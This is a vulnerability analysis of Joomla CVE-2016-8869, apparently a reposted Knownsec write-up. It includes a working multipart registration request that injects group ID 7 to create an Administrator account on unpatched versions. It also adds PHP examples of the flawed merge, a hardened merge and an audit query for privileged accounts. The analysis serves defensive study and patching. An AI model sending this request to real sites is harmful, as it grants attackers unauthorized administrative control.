Joomla unauthorized privileged user creation vulnerability (CVE-2016-8869) analysis

ID MYHACK58:62201680579
Type myhack58
Reporter Anonymous
Modified 2016-10-27T00:00:00


Author: p0wd3r (Knownsec 404 Security Lab)

Date: 2016-10-26

0x00 vulnerability overview

1. Vulnerability description

Joomla is a free, open-source content management system. Researchers recently found two vulnerabilities in versions 3.4.4 through 3.6.3: CVE-2016-8869 and CVE-2016-8870. Here we analyze only CVE-2016-8869. Using this vulnerability, an attacker can register a privileged user even when site registration is disabled. Joomla has published an upgrade bulletin for this vulnerability.

2. Vulnerability impact

A privileged user can still be created while site registration is closed.

3. Affected versions

3.4.4 to 3.6.3

0x01 vulnerability reproduction

1. Environment setup


Decompress the Joomla source into the web server directory, for example /var/www/html.

Create a database:

docker run --name joomla-mysql -e MYSQL_ROOT_PASSWORD=hellojoomla -e MYSQL_DATABASE=jm -d mysql

Open the server path in a browser to run the installer.

2. Vulnerability analysis


For the registration part, see: Joomla unauthorized user creation vulnerability (CVE-2016-8870) analysis.

Privilege escalation

Now we try to create a privileged user.

In the register function of the registration controller, first look at $model->register($data), the method that stores the registration data, in components/com_users/models/registration.php:

    public function register($temp)
    {
        $params = JComponentHelper::getParams('com_users');

        // Initialise the table with JUser.
        $user = new JUser;
        $data = (array) $this->getData();

        // Merge in the registration data.
        foreach ($temp as $k => $v)
        {
            $data[$k] = $v;
        }
        ...
    }

You can see that $temp, which we control, is merged key by key into $data, and $data is then used to store the registration. Under normal circumstances, $data before the merge looks like this:


Under normal circumstances the $temp we control contains no groups key, so a normally registered user receives the permissions set in the configuration, i.e. the groups value that getData() prepared.

The key to escalating privileges is therefore to change the groups value. Because $data is overwritten by the $temp we control, and $temp comes from the request body, we can construct the following request:

POST /index.php/component/users/?task=registration.register HTTP/1.1
...
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryefGhagtDbsLTW5qi
...
Cookie: yourcookie

------WebKitFormBoundaryefGhagtDbsLTW5qi
Content-Disposition: form-data; name="user[name]"

attacker2
------WebKitFormBoundaryefGhagtDbsLTW5qi
Content-Disposition: form-data; name="user[username]"

attacker2
------WebKitFormBoundaryefGhagtDbsLTW5qi
Content-Disposition: form-data; name="user[password1]"

attacker2
------WebKitFormBoundaryefGhagtDbsLTW5qi
Content-Disposition: form-data; name="user[password2]"

attacker2
------WebKitFormBoundaryefGhagtDbsLTW5qi
Content-Disposition: form-data; name="user[email1]"

attacker2@my.local
------WebKitFormBoundaryefGhagtDbsLTW5qi
Content-Disposition: form-data; name="user[email2]"

attacker2@my.local
------WebKitFormBoundaryefGhagtDbsLTW5qi
Content-Disposition: form-data; name="user[groups][]"

7
------WebKitFormBoundaryefGhagtDbsLTW5qi
Content-Disposition: form-data; name="option"

com_users
------WebKitFormBoundaryefGhagtDbsLTW5qi
Content-Disposition: form-data; name="task"

user.register
------WebKitFormBoundaryefGhagtDbsLTW5qi
Content-Disposition: form-data; name="yourtoken"

1
------WebKitFormBoundaryefGhagtDbsLTW5qi--

Here we add a groups value: name="user[groups][]" value=7. PHP parses the user parameter as a two-dimensional array, groups is recognized as an array, and its first element is set to 7, which on a default Joomla installation is the Administrator group.
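The merge above is a mass-assignment bug: the request array is copied over the defaults key by key, so any key the registration form never exposes, groups included, can be supplied by the client. The following standalone PHP script is an added example, not Joomla's own code: it decodes the same form fields as the request above the way PHP builds $_POST, runs them through a merge shaped like register($temp), and then through a hardened variant that whitelists fields and sets groups only from configuration. The function names, the constant DEFAULT_NEW_USER_GROUP and the use of group ID 2 in place of the com_users new_usertype parameter are assumptions made for this example.

```php
<?php
// Added example (not Joomla's code): a self-contained model of the merge in
// UsersModelRegistration::register() and a hardened alternative.

// Group ID given to normally registered users. Assumption for this example:
// it stands in for the com_users "new_usertype" parameter (Joomla default 2 = Registered).
const DEFAULT_NEW_USER_GROUP = 2;

// Constructed input: the form fields from the request above, decoded the way
// PHP decodes them into $_POST. "user[groups][]=7" becomes $post['user']['groups'][0].
function sample_post(): array
{
    $query = 'user[name]=attacker2&user[username]=attacker2'
        . '&user[password1]=attacker2&user[password2]=attacker2'
        . '&user[email1]=attacker2%40my.local&user[email2]=attacker2%40my.local'
        . '&user[groups][]=7&option=com_users&task=user.register';
    parse_str($query, $post);
    return $post;
}

// Vulnerable merge, the pattern shown in register($temp): every key of the
// client-supplied array overwrites the defaults, groups included.
function register_vulnerable(array $temp): array
{
    $data = ['groups' => [DEFAULT_NEW_USER_GROUP]]; // what getData() prepared
    foreach ($temp as $k => $v) {
        $data[$k] = $v;
    }
    return $data;
}

// Hardened merge: copy only the fields the registration form actually exposes,
// and always set the group list from configuration, never from the request.
function register_hardened(array $temp): array
{
    $allowed = ['name', 'username', 'password1', 'password2', 'email1', 'email2'];
    $data = [];
    foreach ($allowed as $k) {
        if (array_key_exists($k, $temp)) {
            $data[$k] = $temp[$k];
        }
    }
    $data['groups'] = [DEFAULT_NEW_USER_GROUP];
    return $data;
}

// True when the stored groups are exactly the configured default, i.e. the
// request could not influence group membership.
function groups_unchanged(array $data): bool
{
    return array_map('intval', $data['groups']) === [DEFAULT_NEW_USER_GROUP];
}

$temp = sample_post()['user'];
echo "client-supplied groups: " . json_encode($temp['groups']) . "\n";
$v = register_vulnerable($temp);
$h = register_hardened($temp);
echo "vulnerable merge stores groups " . json_encode($v['groups'])
    . " (default kept: " . var_export(groups_unchanged($v), true) . ")\n";
echo "hardened merge stores groups   " . json_encode($h['groups'])
    . " (default kept: " . var_export(groups_unchanged($h), true) . ")\n";
```

Run it with php on the command line. The script does not reproduce Joomla's own patch; the point is the shape of the defect: keys the form does not expose must never reach the model, and any field that carries authorization (group membership here) has to be set server-side from configuration rather than taken from the request.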

Then send the request. Through the debugger you can see that $temp now contains a groups array:


Finally, we have created a user attacker2 with Administrator permissions:


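Once an attacker has used this to place an account in a privileged group, the durable artifact is a row in Joomla's user-to-group mapping table, so an audit of privileged memberships is the natural check after patching. The script below is an added example, not part of the original analysis or of Joomla: it lists every account that holds a Manager, Administrator or Super Users group and narrows them to accounts registered after a given date. It builds an in-memory SQLite stand-in for the three relevant Joomla tables (#__users, #__usergroups, #__user_usergroup_map) with constructed rows, including an attacker2 row in group 7 mirroring the result above; the table prefix jos_, the sample rows, the dates and the PRIVILEGED_GROUPS list are assumptions. On a real site you would point the PDO DSN at the Joomla database and pass the site's actual table prefix.

```php
<?php
// Added audit example, not Joomla's own code. Lists accounts that hold a
// privileged group and flags those registered after a given date.

// Joomla default group IDs: 6 = Manager, 7 = Administrator, 8 = Super Users.
const PRIVILEGED_GROUPS = [6, 7, 8];

// Constructed in-memory stand-in for the Joomla tables #__users, #__usergroups
// and #__user_usergroup_map (assumed table prefix "jos_"; sample rows made up
// for this example, the attacker2 row mirrors the user created above).
function build_sample_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE jos_users (id INTEGER PRIMARY KEY, name TEXT, username TEXT, email TEXT, registerDate TEXT)');
    $db->exec('CREATE TABLE jos_usergroups (id INTEGER PRIMARY KEY, title TEXT)');
    $db->exec('CREATE TABLE jos_user_usergroup_map (user_id INTEGER, group_id INTEGER)');
    $db->exec("INSERT INTO jos_usergroups VALUES (2, 'Registered'), (7, 'Administrator'), (8, 'Super Users')");
    $db->exec("INSERT INTO jos_users VALUES
        (42, 'Site Owner', 'owner', 'owner@my.local', '2016-01-05 10:00:00'),
        (43, 'Jane Reader', 'jane', 'jane@my.local', '2016-09-30 08:15:00'),
        (44, 'attacker2', 'attacker2', 'attacker2@my.local', '2016-10-26 14:12:33')");
    $db->exec('INSERT INTO jos_user_usergroup_map VALUES (42, 8), (43, 2), (44, 7)');
    return $db;
}

// Every (account, privileged group) pair, newest registration first.
function privileged_accounts(PDO $db, string $prefix = 'jos_'): array
{
    $in = implode(',', array_map('intval', PRIVILEGED_GROUPS));
    $sql = "SELECT u.id, u.username, u.email, u.registerDate, g.title AS groupTitle
            FROM {$prefix}users u
            JOIN {$prefix}user_usergroup_map m ON m.user_id = u.id
            JOIN {$prefix}usergroups g ON g.id = m.group_id
            WHERE m.group_id IN ($in)
            ORDER BY u.registerDate DESC";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Narrow to accounts registered on or after $since, e.g. the day registration
// was switched off or the last admin-account review. Joomla stores registerDate
// as 'YYYY-MM-DD HH:MM:SS', so plain string comparison orders correctly.
function privileged_accounts_since(PDO $db, string $since, string $prefix = 'jos_'): array
{
    return array_values(array_filter(
        privileged_accounts($db, $prefix),
        function (array $row) use ($since) {
            return strcmp($row['registerDate'], $since) >= 0;
        }
    ));
}

$db = build_sample_db();
echo "All privileged accounts:\n";
foreach (privileged_accounts($db) as $row) {
    printf("  %-10s %-20s %-14s %s\n", $row['username'], $row['email'], $row['groupTitle'], $row['registerDate']);
}
echo "Privileged accounts registered since 2016-10-01:\n";
foreach (privileged_accounts_since($db, '2016-10-01 00:00:00') as $row) {
    printf("  %-10s %-14s %s\n", $row['username'], $row['groupTitle'], $row['registerDate']);
}
```

The query joins on the mapping table rather than trusting any per-user field, because group membership in Joomla lives only in that table. A date filter alone is a weak signal; a privileged account that nobody on the team recognizes is the thing to act on regardless of when it was registered.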
Through the vulnerable registration function we can escalate privileges. So, when registration is allowed, can we also escalate through the normal registration function?
